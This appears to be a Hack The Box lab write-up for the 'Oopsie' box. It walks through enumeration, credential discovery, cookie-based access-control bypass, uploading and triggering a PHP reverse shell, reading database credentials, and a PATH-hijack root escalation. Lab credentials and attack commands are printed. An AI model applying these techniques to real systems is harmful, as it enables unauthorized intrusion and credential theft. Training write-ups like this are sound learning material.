HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • Web Access and Insecure Cookie Abuse
  • Shell Access and Pillaging
  • Insecure Relative Path
  1. Boxes: Very Easy

Oopsie

Personal Rating: Easy

Enumeration

A first nmap scan reveals some open ports:

sudo nmap -sC <IP>

# 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
# 80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome

At the webserver the directory /cdn-cgi was listable. The directory itself could be found by fuzzing for it with ffuf. I found /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js, which contained some credentials:

admin
MEGACORP_4dm1n!!
34322	admin	admin@megacorp.com
8832	john	john@tafcz.co.uk
86575	super admin	superadmin@megacorp.com

Web Access and Insecure Cookie Abuse

Logging in at the webserver at http://<TARGETIP>/cdn_cgi/login with the credentials I found, there was a file upload feature, that seemed to require higher permissions of some "super admin".

Since the page was PHP based and there was no session information in the URL, maybe there was a session cookie... I found the cookie, which was not a proper sessionID, but a custom string. In the public code of the /login/admin.php I found this:

if($_COOKIE["user"]==="34322" || $_COOKIE["user"]==="86575")

So I got privileged access to http://<TARGETIP>/cdn_cgi/login/admin.php?content=uploads&action=upload by loading that page with the cookie set to "34322".

Shell Access and Pillaging

At the upload page I could upload a PHP reverse shell and activate it with curl:

curl http://10.10.10.28/uploads/php-reverse-shell.php

The shell was as the user www-data. Running cat /var/www/html/cdn-cgi/login/db.php yielded the following credentials:

conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');

As that user robert I could establish an ssh connection.

Insecure Relative Path

Checking the groups of the user I saw that robert had the group "bugtracker". With this group you can execute /usr/bin/bugtracker as root. A simple strings bugtracker shew me this:

------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"

I created the file /home/robert/soos/cat which is a script that starts /bin/bash. Then I exported the directory to the PATH, so that my version of cat is used when calling cat without an absolute path:

export PATH=/home/robert/soos:$PATH

Executing the bugtracker binary now, I could start a root shell.

PreviousMarkupNextRedeemer

Last updated 1 year ago